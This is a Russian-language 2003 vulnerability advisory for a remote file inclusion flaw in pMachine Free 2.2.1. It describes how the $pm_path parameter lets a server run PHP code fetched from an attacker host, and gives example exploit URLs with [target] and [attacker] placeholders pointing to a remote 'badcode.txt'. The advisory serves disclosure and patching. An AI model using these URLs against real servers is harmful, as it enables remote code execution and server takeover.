Удаленное выполнение произвольного PHP кода в pMachine
| Дата публикации: | 18.06.2003 |
| Всего просмотров: | 1866 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость включения файла обнаружена в системе управления содержанием
pMachine. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Сообщается, что недостаток в сценарии 'pm/inc.lib.php' позволяет удаленному пользователю определить удаленное местоположение для переменной $pm_path, чтобы заставить сервер включить файл в удаленном местоположении. PHP код в файле, Включая команды операционной системы, будут выполнены на целевом сервере с привилегиями целевого Web сервера. Пример: http://[target]/pm/lib.inc.php?pm_path=htt p://[attacker]/&sfx=.txt with: http://[attacker]/config.txt http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt with: http://[attacker]/conf ig/badcode.txtУязвимость обнаружена в pMachine Free 2.2.1 Неофициальный патч опубликован на сайте http://www.phpsecure.info
|
| Ссылки: | pMachine (PHP) : Include() Security Hole |